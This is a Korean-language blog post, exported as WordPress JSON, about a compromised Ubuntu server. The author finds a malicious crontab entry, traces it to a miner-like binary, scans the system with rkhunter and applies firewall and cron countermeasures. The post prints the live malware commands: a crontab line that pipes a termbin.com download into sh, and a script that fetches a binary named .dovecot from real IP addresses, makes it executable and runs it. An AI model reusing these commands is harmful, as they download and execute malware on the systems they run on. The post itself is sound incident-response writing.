{"id":683,"date":"2019-06-10T09:32:55","date_gmt":"2019-06-10T00:32:55","guid":{"rendered":"https:\/\/www.kkoc.org\/?p=683"},"modified":"2019-07-06T14:37:39","modified_gmt":"2019-07-06T05:37:39","slug":"%ed%95%b4%ed%82%b9-%ec%9d%98%ec%8b%ac","status":"publish","type":"post","link":"https:\/\/www.kkoc.org\/?p=683","title":{"rendered":"\ud574\ud0b9 \uc758\uc2ec"},"content":{"rendered":"\n<p>\uc5b8\uc81c \ubd80\ud130\uc778\uac00 ubuntu \uc11c\ubc84\uc5d0 CPU\uac00 100%\uc774\uc0c1 \uc0ac\uc6a9\ud558\ub294 \ud504\ub85c\uc138\uc2a4\uac00 \ubcf4\uc774\uace0 \ud574\ud0b9\uc774 \uc758\uc2ec\ub418\ub294 \ud604\uc0c1\uc774 \ubc1c\uc0dd\ud588\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n<p>crontab\uc5d0 \ub0b4\uac00 \ub4f1\ub85d\ud55c job\uc774 \uc5c6\uc5b4 \uc9c0\uace0 \uc544\ub798\uc758 \ud56d\ubaa9\uc774 \ucd94\uac00\ub41c\uac83\uc744 \ud655\uc778\ud558\uace0 \ucc98\uc74c\uc5d0\ub294 \ubcf4\uc548\ud328\uce58\ub97c \ud574\uc11c \uc790\ub3d9\uc73c\ub85c \ub4f1\ub85d\ub418\ub294 job\uc778\uc904 \uc54c\uace0 \ub300\uc18c\ub86d\uac8c \uc5ec\uae30\uc9c0 \uc54a\uace0 \uadf8\ub0e5 \ub118\uc5b4 \uac14\ub294\ub370&#8230; \uc5b4\ub290 \uc21c\uac04\uc778\uac00 \ub3d9\uc77c\ud55c \ub0b4\uc6a9\uc774 \ub4f1\ub85d\ub418\uc5b4 \uc788\ub294\uac83\uc744 \ubcf4\uace0 \ub09c\uac10\ud588\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n<p>crontab -l \uba85\ub839\uc73c\ub85c \uc870\ud68c\ub97c \ud574\ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\">ubuntu:~$ crontab -l\n*\/23 * * * * (curl -k -fsSL https:\/\/termbin.com\/mfzn || wget --no-check-certificate -q -O- https:\/\/termbin.com\/mfzn)|sh<\/pre>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<p>https:\/\/termbin.com\/mfzn \uc0ac\uc774\ud2b8\uc5d0 \uc811\uc18d\ud574\uba74&#8230;<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">((curl -fsSL --connect-timeout 10 http:\/\/186.226.176.254\/dovecot -o \/tmp\/.dovecot || wget --timeout=10 -q http:\/\/186.226.176.254\/dovecot -O \/tmp\/.dovecot)||curl -fsSL --connect-timeout 10 http:\/\/185.84.91.154:443\/dovecot -o \/tmp\/.dovecot||wget --timeout=10 -q http:\/\/185.84.91.154:443\/dovecot -O \/tmp\/.dovecot) &amp;&amp; chmod +x \/tmp\/.dovecot\n\/tmp\/.dovecot<\/pre>\n\n\n\n<p>dovecot \ud30c\uc77c\uc740 linux-vdso.so, libc.so \ub4f1 \ub77c\uc774\ube0c\ub7ec\ub9ac\ub97c \ucc38\uc870\ud558\ub294 \ub188\uc785\ub2c8\ub2e4. \ub9e4\uc2dc\uac04 23\ubd84 \ub9c8\ub2e4 \/tmp\/.dovecot  \ubc1b\uc544\uc11c \uc2e4\ud589\uad8c\ud55c\uc744 \uc124\uc815\ud558\uac8c \uc2a4\ud06c\ub9bd\ud2b8\ub97c \uc124\uc815\ud574 \ub193\uace0 \uc788\uc5c8\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code> ubuntu:~$  ldd dovecot     \n         linux-vdso.so.1 =>  (0x00007ffe927c5000)\n         libc.so.6 => \/lib64\/libc.so.6 (0x00007fc8c1900000)\n         \/lib64\/ld-linux-x86-64.so.2 (0x00007fc8c1ccd000)<\/code><\/pre>\n\n\n\n<p>\ub204\uac00 \uc5b4\ub5a4 \uacbd\ub85c\ub85c \uc5b4\ub5bb\uac8c \uc124\uce58 \ud588\ub294\uc9c0 \ucc3e\uc744 \uc218 \uc788\uc744\uc9c0 \ubaa8\ub974\uaca0\ub2e4&#8230;<\/p>\n<p>\uc815\uc2e0\uc744 \ucc28\ub9ac\uace0 tmp \ud3f4\ub354 \ubd80\ud130 \ub2e4\uc2dc \ucc3e\uc544 \ubcf8\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"shell\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">root@ubuntu:\/tmp# ls -al\n\ud569\uacc4 104\ndrwxrwxrwt 24 root  root  4096  6\uc6d4 11 09:36 .\ndrwxr-xr-x 24 root  root  4096  6\uc6d4  5 22:53 ..\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .ICE-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .Test-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .X11-unix\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .XIM-unix\n-rwxr-x---  1 chohi chohi 6752  5\uc6d4 30 03:32 .dovecot\ndrwxrwxrwt  2 root  root  4096  6\uc6d4  5 22:58 .font-unix\ndrwxr-x---  2 chohi chohi 4096  6\uc6d4 10 09:43 hsperfdata_chohi\ndrwxrwxr-x  2 chohi chohi 4096  6\uc6d4  5 23:08 jna-94636843\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:05 ssh-3doo9adyu6\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 05:50 ssh-6J2YGqCSwx\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:46 ssh-9g4AChhpsN\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 22:59 ssh-TgPJ00EnoH\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 15:54 ssh-aIcaUjsQCw\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 00:07 ssh-lAdtd5e1rP\ndrwx------  2 chohi chohi 4096  6\uc6d4  6 00:47 ssh-n3ek5TdGX5\ndrwx------  2 chohi chohi 4096  6\uc6d4 11 08:36 ssh-sXzTLmvSwT\ndrwx------  2 chohi chohi 4096  6\uc6d4 11 09:18 ssh-svffT93zdp\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 16:08 ssh-wg9C63dF0Z\ndrwx------  2 chohi chohi 4096  6\uc6d4  8 15:57 ssh-ymPNhE1UBh\ndrwx------  2 chohi chohi 4096  6\uc6d4  5 23:26 ssh-zYYK0JxBYP\ndrwx------  3 root  root  4096  6\uc6d4  5 22:58 systemd-private-505c245ad90b489d94c81a140a27e391-systemd-resolved.service-Zgg598\ndrwx------  3 root  root  4096  6\uc6d4  5 22:58 systemd-private-505c245ad90b489d94c81a140a27e391-systemd-timesyncd.service-a47ed2\ndrwx------  2 root  root  4096  6\uc6d4  5 22:58 vmware-root_670-2722828838<\/pre>\n\n\n\n<p>5\uc6d4 30\uc77c 03\uc2dc 32\ubd84 .dovecot \ud30c\uc77c\uc774 \uc0dd\uacbc\ub2e4. \uc774\uc2dc\uac04\ub300 \ub85c\uadf8\ub97c \ubd10\uc57c \ud558\ub294\ub370, \uc2dc\uac04\uc774 \ub9ce\uc774 \uc9c0\ub098\uc11c \ud655\uc778\uc740 \ubabb\ud588\ub2e4.<\/p>\n\n\n\n<p>rkhunter (Rootkit Hunter)\ub8e8\ud2b8\ud0b7 , \ubc31\ub3c4\uc5b4 \ubc0f \uac00\ub2a5\ud55c \ub85c\uceec \uc775\uc2a4\ud50c\ub85c\uc787 \uc744 \uac80\uc0c9 \ud558\ub294 Unix \uae30\ubc18 \ub3c4\uad6c\ub97c \uc124\uce58\ud558\uc5ec \uc810\uac80\ud574 \ubd24\uc2b5\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># rkhunter \ub2e4\uc6b4\ub85c\ub4dc \n[root@www ]# wget http:\/\/downloads.sourceforge.net\/rkhunter\/rkhunter-1.4.6.tar.gz \n\n# \uc555\ucd95\ud480\uc5b4 \uc8fc\uace0 \uc124\uce58\ub97c \uc9c4\ud589\ud569\ub2c8\ub2e4.\nroot@ubuntu:~\/temp\/rkhunter-1.4.6# .\/installer.sh --install\nChecking system for:\n Rootkit Hunter installer files: found\n A web file download command: wget found\nStarting installation:\n Checking installation directory \"\/usr\/local\": it exists and is writable.\n Checking installation directories:\n  Directory \/usr\/local\/share\/doc\/rkhunter-1.4.6: creating: OK\n  Directory \/usr\/local\/share\/man\/man8: creating: OK\n  Directory \/etc: exists and is writable.\n  Directory \/usr\/local\/bin: exists and is writable.\n  Directory \/usr\/local\/lib: exists and is writable.\n  Directory \/var\/lib: exists and is writable.\n  Directory \/usr\/local\/lib\/rkhunter\/scripts: creating: OK\n  Directory \/var\/lib\/rkhunter\/db: creating: OK\n  Directory \/var\/lib\/rkhunter\/tmp: creating: OK\n  Directory \/var\/lib\/rkhunter\/db\/i18n: creating: OK\n  Directory \/var\/lib\/rkhunter\/db\/signatures: creating: OK\n Installing check_modules.pl: OK\n Installing filehashsha.pl: OK\n Installing stat.pl: OK\n Installing readlink.sh: OK\n Installing backdoorports.dat: OK\n Installing mirrors.dat: OK\n Installing programs_bad.dat: OK\n Installing suspscan.dat: OK\n Installing rkhunter.8: OK\n Installing ACKNOWLEDGMENTS: OK\n Installing CHANGELOG: OK\n Installing FAQ: OK\n Installing LICENSE: OK\n Installing README: OK\n Installing language support files: OK\n Installing ClamAV signatures: OK\n Installing rkhunter: OK\n Installing rkhunter.conf: OK\nInstallation complete\n\n# rkhunter \uc2e4\ud589.\nroot@ubuntu:~\/temp\/rkhunter-1.4.6# rkhunter -c\n[ Rootkit Hunter version 1.4.6 ]\n\nChecking system commands...\n\n  Performing 'strings' command checks\n    Checking 'strings' command                               [ Skipped ]\n\n  Performing 'shared libraries' checks\n    Checking for preloading variables                        [ None found ]\n    Checking for preloaded libraries                         [ None found ]\n    Checking LD_LIBRARY_PATH variable                        [ Not found ]\n\n  Performing file properties checks\n    Checking for prerequisites                               [ Warning ]\n    \/usr\/local\/bin\/rkhunter                                  [ OK ]\n    \/usr\/sbin\/adduser                                        [ Warning ]\n    \/usr\/sbin\/chroot                                         [ OK ]\n    \/usr\/sbin\/cron                                           [ OK ]\n    \/usr\/sbin\/groupadd                                       [ OK ]\n    \/usr\/sbin\/groupdel                                       [ OK ]\n    \/usr\/sbin\/groupmod                                       [ OK ]\n    \/usr\/sbin\/grpck                                          [ OK ]\n    \/usr\/sbin\/nologin                                        [ OK ]\n    \/usr\/sbin\/pwck                                           [ OK ]\n    \/usr\/sbin\/rsyslogd                                       [ OK ]\n    \/usr\/sbin\/sshd                                           [ OK ]\n    \/usr\/sbin\/useradd                                        [ OK ]\n    \/usr\/sbin\/userdel                                        [ OK ]\n    \/usr\/sbin\/usermod                                        [ OK ]\n    \/usr\/sbin\/vipw                                           [ OK ]\n    \/usr\/bin\/awk                                             [ OK ]\n    \/usr\/bin\/basename                                        [ OK ]\n    \/usr\/bin\/chattr                                          [ OK ]\n    \/usr\/bin\/cut                                             [ OK ]\n    \/usr\/bin\/diff                                            [ OK ]\n    \/usr\/bin\/dirname                                         [ OK ]\n    \/usr\/bin\/dpkg                                            [ OK ]\n    \/usr\/bin\/dpkg-query                                      [ OK ]\n    \/usr\/bin\/du                                              [ OK ]\n    \/usr\/bin\/env                                             [ OK ]\n    \/usr\/bin\/file                                            [ OK ]\n    \/usr\/bin\/find                                            [ OK ]\n    \/usr\/bin\/groups                                          [ OK ]\n    \/usr\/bin\/head                                            [ OK ]\n    \/usr\/bin\/id                                              [ OK ]\n    \/usr\/bin\/ipcs                                            [ OK ]\n    \/usr\/bin\/killall                                         [ OK ]\n    \/usr\/bin\/last                                            [ OK ]\n    \/usr\/bin\/lastlog                                         [ OK ]\n    \/usr\/bin\/ldd                                             [ Warning ]\n    \/usr\/bin\/less                                            [ OK ]\n    \/usr\/bin\/locate                                          [ OK ]\n    \/usr\/bin\/logger                                          [ OK ]\n    \/usr\/bin\/lsattr                                          [ OK ]\n    \/usr\/bin\/lsof                                            [ OK ]\n    \/usr\/bin\/md5sum                                          [ OK ]\n    \/usr\/bin\/mlocate                                         [ OK ]\n    \/usr\/bin\/newgrp                                          [ OK ]\n    \/usr\/bin\/passwd                                          [ OK ]\n    \/usr\/bin\/perl                                            [ OK ]\n    \/usr\/bin\/pgrep                                           [ OK ]\n    \/usr\/bin\/pkill                                           [ OK ]\n    \/usr\/bin\/pstree                                          [ OK ]\n    \/usr\/bin\/rpm                                             [ OK ]\n    \/usr\/bin\/runcon                                          [ OK ]\n    \/usr\/bin\/sha1sum                                         [ OK ]\n    \/usr\/bin\/sha224sum                                       [ OK ]\n    \/usr\/bin\/sha256sum                                       [ OK ]\n    \/usr\/bin\/sha384sum                                       [ OK ]\n    \/usr\/bin\/sha512sum                                       [ OK ]\n    \/usr\/bin\/sort                                            [ OK ]\n    \/usr\/bin\/ssh                                             [ OK ]\n    \/usr\/bin\/stat                                            [ OK ]\n    \/usr\/bin\/strace                                          [ OK ]\n    \/usr\/bin\/sudo                                            [ OK ]\n    \/usr\/bin\/tail                                            [ OK ]\n    \/usr\/bin\/telnet                                          [ OK ]\n    \/usr\/bin\/test                                            [ OK ]\n    \/usr\/bin\/top                                             [ OK ]\n    \/usr\/bin\/touch                                           [ OK ]\n    \/usr\/bin\/tr                                              [ OK ]\n    \/usr\/bin\/uniq                                            [ OK ]\n    \/usr\/bin\/users                                           [ OK ]\n    \/usr\/bin\/vmstat                                          [ OK ]\n    \/usr\/bin\/w                                               [ OK ]\n    \/usr\/bin\/watch                                           [ OK ]\n    \/usr\/bin\/wc                                              [ OK ]\n    \/usr\/bin\/wget                                            [ OK ]\n    \/usr\/bin\/whatis                                          [ OK ]\n    \/usr\/bin\/whereis                                         [ OK ]\n    \/usr\/bin\/which                                           [ OK ]\n    \/usr\/bin\/who                                             [ OK ]\n    \/usr\/bin\/whoami                                          [ OK ]\n    \/usr\/bin\/numfmt                                          [ OK ]\n    \/usr\/bin\/gawk                                            [ OK ]\n    \/usr\/bin\/telnet.netkit                                   [ OK ]\n    \/usr\/bin\/w.procps                                        [ OK ]\n    \/sbin\/depmod                                             [ OK ]\n    \/sbin\/fsck                                               [ OK ]\n    \/sbin\/ifconfig                                           [ OK ]\n    \/sbin\/ifdown                                             [ OK ]\n    \/sbin\/ifup                                               [ OK ]\n    \/sbin\/init                                               [ OK ]\n    \/sbin\/insmod                                             [ OK ]\n    \/sbin\/ip                                                 [ OK ]\n    \/sbin\/lsmod                                              [ OK ]\n    \/sbin\/modinfo                                            [ OK ]\n    \/sbin\/modprobe                                           [ OK ]\n    \/sbin\/rmmod                                              [ OK ]\n    \/sbin\/route                                              [ OK ]\n    \/sbin\/runlevel                                           [ OK ]\n    \/sbin\/sulogin                                            [ OK ]\n    \/sbin\/sysctl                                             [ OK ]\n    \/bin\/bash                                                [ OK ]\n    \/bin\/cat                                                 [ OK ]\n    \/bin\/chmod                                               [ OK ]\n    \/bin\/chown                                               [ OK ]\n    \/bin\/cp                                                  [ OK ]\n    \/bin\/date                                                [ OK ]\n    \/bin\/df                                                  [ OK ]\n    \/bin\/dmesg                                               [ OK ]\n    \/bin\/echo                                                [ OK ]\n    \/bin\/ed                                                  [ OK ]\n    \/bin\/egrep                                               [ Warning ]\n    \/bin\/fgrep                                               [ Warning ]\n    \/bin\/fuser                                               [ OK ]\n    \/bin\/grep                                                [ OK ]\n    \/bin\/ip                                                  [ OK ]\n    \/bin\/kill                                                [ OK ]\n    \/bin\/less                                                [ OK ]\n    \/bin\/login                                               [ OK ]\n    \/bin\/ls                                                  [ OK ]\n    \/bin\/lsmod                                               [ OK ]\n    \/bin\/mktemp                                              [ OK ]\n    \/bin\/more                                                [ OK ]\n    \/bin\/mount                                               [ OK ]\n    \/bin\/mv                                                  [ OK ]\n    \/bin\/netstat                                             [ OK ]\n    \/bin\/ping                                                [ OK ]\n    \/bin\/ps                                                  [ OK ]\n    \/bin\/pwd                                                 [ OK ]\n    \/bin\/readlink                                            [ OK ]\n    \/bin\/sed                                                 [ OK ]\n    \/bin\/sh                                                  [ OK ]\n    \/bin\/su                                                  [ OK ]\n    \/bin\/touch                                               [ OK ]\n    \/bin\/uname                                               [ OK ]\n    \/bin\/which                                               [ Warning ]\n    \/bin\/kmod                                                [ OK ]\n    \/bin\/systemd                                             [ OK ]\n    \/bin\/systemctl                                           [ OK ]\n    \/bin\/dash                                                [ OK ]\n    \/lib\/systemd\/systemd                                     [ OK ]\n    \/etc\/rkhunter.conf                                       [ OK ]\n\n[Press &lt;ENTER> to continue]\n\n\nChecking for rootkits...\n\n  Performing check of known rootkit files and directories\n    55808 Trojan - Variant A                                 [ Not found ]\n    ADM Worm                                                 [ Not found ]\n    AjaKit Rootkit                                           [ Not found ]\n    Adore Rootkit                                            [ Not found ]\n    aPa Kit                                                  [ Not found ]\n    Apache Worm                                              [ Not found ]\n    Ambient (ark) Rootkit                                    [ Not found ]\n    Balaur Rootkit                                           [ Not found ]\n    BeastKit Rootkit                                         [ Not found ]\n    beX2 Rootkit                                             [ Not found ]\n    BOBKit Rootkit                                           [ Not found ]\n    cb Rootkit                                               [ Not found ]\n    CiNIK Worm (Slapper.B variant)                           [ Not found ]\n    Danny-Boy's Abuse Kit                                    [ Not found ]\n    Devil RootKit                                            [ Not found ]\n    Diamorphine LKM                                          [ Not found ]\n    Dica-Kit Rootkit                                         [ Not found ]\n    Dreams Rootkit                                           [ Not found ]\n    Duarawkz Rootkit                                         [ Not found ]\n    Ebury backdoor                                           [ Not found ]\n    Enye LKM                                                 [ Not found ]\n    Flea Linux Rootkit                                       [ Not found ]\n    Fu Rootkit                                               [ Not found ]\n    Fuck`it Rootkit                                          [ Not found ]\n    GasKit Rootkit                                           [ Not found ]\n    Heroin LKM                                               [ Not found ]\n    HjC Kit                                                  [ Not found ]\n    ignoKit Rootkit                                          [ Not found ]\n    IntoXonia-NG Rootkit                                     [ Not found ]\n    Irix Rootkit                                             [ Not found ]\n    Jynx Rootkit                                             [ Not found ]\n    Jynx2 Rootkit                                            [ Not found ]\n    KBeast Rootkit                                           [ Not found ]\n    Kitko Rootkit                                            [ Not found ]\n    Knark Rootkit                                            [ Not found ]\n    ld-linuxv.so Rootkit                                     [ Not found ]\n    Li0n Worm                                                [ Not found ]\n    Lockit \/ LJK2 Rootkit                                    [ Not found ]\n    Mokes backdoor                                           [ Not found ]\n    Mood-NT Rootkit                                          [ Not found ]\n    MRK Rootkit                                              [ Not found ]\n    Ni0 Rootkit                                              [ Not found ]\n    Ohhara Rootkit                                           [ Not found ]\n    Optic Kit (Tux) Worm                                     [ Not found ]\n    Oz Rootkit                                               [ Not found ]\n    Phalanx Rootkit                                          [ Not found ]\n    Phalanx2 Rootkit                                         [ Not found ]\n    Phalanx2 Rootkit (extended tests)                        [ Not found ]\n    Portacelo Rootkit                                        [ Not found ]\n    R3dstorm Toolkit                                         [ Not found ]\n    RH-Sharpe's Rootkit                                      [ Not found ]\n    RSHA's Rootkit                                           [ Not found ]\n    Scalper Worm                                             [ Not found ]\n    Sebek LKM                                                [ Not found ]\n    Shutdown Rootkit                                         [ Not found ]\n    SHV4 Rootkit                                             [ Not found ]\n    SHV5 Rootkit                                             [ Not found ]\n    Sin Rootkit                                              [ Not found ]\n    Slapper Worm                                             [ Not found ]\n    Sneakin Rootkit                                          [ Not found ]\n    'Spanish' Rootkit                                        [ Not found ]\n    Suckit Rootkit                                           [ Not found ]\n    Superkit Rootkit                                         [ Not found ]\n    TBD (Telnet BackDoor)                                    [ Not found ]\n    TeLeKiT Rootkit                                          [ Not found ]\n    T0rn Rootkit                                             [ Not found ]\n    trNkit Rootkit                                           [ Not found ]\n    Trojanit Kit                                             [ Not found ]\n    Tuxtendo Rootkit                                         [ Not found ]\n    URK Rootkit                                              [ Not found ]\n    Vampire Rootkit                                          [ Not found ]\n    VcKit Rootkit                                            [ Not found ]\n    Volc Rootkit                                             [ Not found ]\n    Xzibit Rootkit                                           [ Not found ]\n    zaRwT.KiT Rootkit                                        [ Not found ]\n    ZK Rootkit                                               [ Not found ]\n\n[Press &lt;ENTER> to continue]\n\n\n  Performing additional rootkit checks\n    Suckit Rootkit additional checks                         [ OK ]\n    Checking for possible rootkit files and directories      [ None found ]\n    Checking for possible rootkit strings                    [ Skipped ]\n\n  Performing malware checks\n    Checking running processes for suspicious files          [ None found ]\n    Checking for login backdoors                             [ None found ]\n    Checking for sniffer log files                           [ None found ]\n    Checking for suspicious directories                      [ None found ]\n    Checking for suspicious (large) shared memory segments   [ None found ]\n\n  Performing Linux specific checks\n    Checking loaded kernel modules                           [ OK ]\n    Checking kernel module names                             [ OK ]\n\n[Press &lt;ENTER> to continue]\n\n\nChecking the network...\n\n  Performing checks on the network ports\n    Checking for backdoor ports                              [ None found ]\n\n  Performing checks on the network interfaces\n    Checking for promiscuous interfaces                      [ None found ]\n\nChecking the local host...\n\n  Performing system boot checks\n    Checking for local host name                             [ Found ]\n    Checking for system startup files                        [ Found ]\n    Checking system startup files for malware                [ None found ]\n\n  Performing group and account checks\n    Checking for passwd file                                 [ Found ]\n    Checking for root equivalent (UID 0) accounts            [ None found ]\n    Checking for passwordless accounts                       [ None found ]\n    Checking for passwd file changes                         [ None found ]\n    Checking for group file changes                          [ None found ]\n    Checking root account shell history files                [ OK ]\n\n  Performing system configuration file checks\n    Checking for an SSH configuration file                   [ Found ]\n    Checking if SSH root access is allowed                   [ Warning ]\n    Checking if SSH protocol v1 is allowed                   [ Warning ]\n    Checking for other suspicious configuration settings     [ None found ]\n    Checking for a running system logging daemon             [ Found ]\n    Checking for a system logging configuration file         [ Found ]\n    Checking if syslog remote logging is allowed             [ Not allowed ]\n\n  Performing filesystem checks\n    Checking \/dev for suspicious file types                  [ None found ]\n    Checking for hidden files and directories                [ Warning ]\n\n[Press &lt;ENTER> to continue]\n\n\n\nSystem checks summary\n=====================\n\nFile properties checks...\n    Required commands check failed\n    Files checked: 140\n    Suspect files: 5\n\nRootkit checks...\n    Rootkits checked : 380\n    Possible rootkits: 0\n\nApplications checks...\n    All checks skipped\n\nThe system checks took: 2 minutes and 22 seconds\n\nAll results have been written to the log file: \/var\/log\/rkhunter.log\n\nOne or more warnings have been found while checking the system.\nPlease check the log file (\/var\/log\/rkhunter.log)<\/code><\/pre>\n\n\n\n<p>\uc2dc\uc2a4\ud15c \uc810\uac80 \uacb0\uacfc \ub2e4\ud589\ud788 \uac80\ucd9c\ub418\uc9c0 \uc54a\uc558\uc2b5\ub2c8\ub2e4.<\/p>\n<p>&nbsp;<\/p>\n\n\n\n<h2>\uc870\uce58\ub0b4\uc6a9<\/h2>\n\n\n\n<h4>1. crontab \ub4f1\ub85d \uad8c\ud55c \uc870\uc815<\/h4>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># \/etc\/cron.deny \ud30c\uc77c\uc5d0 \uac70\ubd80 \uacc4\uc815 \ub4f1\ub85d\nchohi<\/pre>\n\n\n\n<h4>2. curl \uc0ad\uc81c \ucc98\ub9ac<\/h4>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># sudo apt-get remove curl<\/pre>\n\n\n\n<h4>3. ssh \ud3ec\ud2b8 22-&gt; 5\uc790\ub9ac\ub85c \ubcc0\uacbd<\/h4>\n\n\n\n<h4>4. \ubc29\ud654\ubcbd SSH, \uc6f9\uc11c\ube44\uc2a4 \ub0b4\ubd80 \ud3ec\ud2b8\ub9cc accept \ub098\uba38\uc9c0\ub294 drop <\/h4>\n\n\n\n<h4>5. \uc811\uadfc \uac70\ubd80 IP \ubc29\ud654\ubcbd \ucd94\uac00<\/h4>\n\n\n\n<p># sudo ufw deny from 52.44.244.0\/24  <\/p>\n\n\n\n<p> Anywhere                   DENY IN     52.44.244.0\/24            <br> Anywhere                   DENY IN     185.84.91.0\/24            <br> Anywhere                   DENY IN     186.226.176.0\/24          <br> Anywhere                   DENY IN     5.39.93.0\/24  <\/p>\n\n\n\n<h4>6. outgoing \uae30\ubcf8\uc815\ucc45 deny\ub85c \uc124\uc815<\/h4>\n\n\n\n<p><\/p>\n\n\n\n<p>sudo ufw default deny outgoing  #\ub098\uac00\ub294 \ud328\ud0b7 deny<\/p>\n\n\n\n<p>sudo ufw allow out to \ud2b9\uc815IP  port 443 proto tcp  #\ub098\uac00\ub294 \ud328\ud0b7 \ud2b9\uc815IP 443\ub9cc \ud5c8\uc6a9<\/p>\n\n\n\n<p>sudo ufw status verbose #\ubc29\ud654\ubcbd \uc124\uc815\ud655\uc778<\/p>\n\n\n\n<hr>\n<pre class=\"wp-block-preformatted\">&nbsp;<\/pre>\n\n\n\n<h2>\ub85c\uadf8 \uc810\uac80<\/h2>\n\n\n\n<p>\/var\/log\/message<\/p>\n\n\n\n<p>\/var\/log\/secure<\/p>\n\n\n\n<p>\/var\/log\/dmesg<\/p>\n\n\n\n<p>\/var\/log\/lastlog<\/p>\n\n\n\n<p>\/var\/spool\/cron<\/p>\n\n\n\n<p>\/var\/log\/utmp<\/p>\n\n\n\n<p>\/var\/log\/wtmp<\/p>\n\n\n\n<p>\/var\/log\/btmp<\/p>\n\n\n\n<p>\/var\/log\/vtmp<\/p>\n\n\n\n<p>&nbsp; <\/p>\n\n\n\n<h2>\ubc14\uc774\ub7ec\uc2a4 \uac80\uc0ac( <a href=\"https:\/\/www.virustotal.com\/\">https:\/\/www.virustotal.com<\/a> )<\/h2>\n\n\n\n<p> dovecot\ud30c\uc77c\uc744 \uc62c\ub824\uc11c \uac80\uc0ac\ub97c \ud574\uc90d\ub2c8\ub2e4.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><img loading=\"lazy\" class=\"alignnone size-large wp-image-712\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-876x1024.png\" alt=\"\" width=\"876\" height=\"1024\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-876x1024.png 876w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-257x300.png 257w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00-768x898.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-detection-2019-06-12-10_07_00.png 1920w\" sizes=\"(max-width: 876px) 100vw, 876px\" \/><br \/><br \/><img loading=\"lazy\" class=\"alignnone size-large wp-image-713\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-1024x801.png\" alt=\"\" width=\"1024\" height=\"801\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-1024x801.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-300x235.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35-768x601.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-details-2019-06-12-10_07_35.png 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><img loading=\"lazy\" class=\"alignnone size-large wp-image-714\" src=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-1024x578.png\" alt=\"\" width=\"1024\" height=\"578\" srcset=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-1024x578.png 1024w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-300x169.png 300w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52-768x433.png 768w, https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/06\/virustotal-relations-2019-06-12-10_10_52.png 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/pre>\n\n\n\n\n\n\n\n<div class=\"wp-block-file\"><a href=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/07\/Downloads.pdf\">Downloads<\/a><a href=\"https:\/\/www.kkoc.org\/wp-content\/uploads\/2019\/07\/Downloads.pdf\" class=\"wp-block-file__button\" download>\ub2e4\uc6b4\ub85c\ub4dc<\/a><\/div>\n\n\n","protected":false},"excerpt":{"rendered":"<p>\uc5b8\uc81c \ubd80\ud130\uc778\uac00 ubuntu \uc11c\ubc84\uc5d0 CPU\uac00 100%\uc774\uc0c1 \uc0ac\uc6a9\ud558\ub294 \ud504\ub85c\uc138\uc2a4\uac00 \ubcf4\uc774\uace0 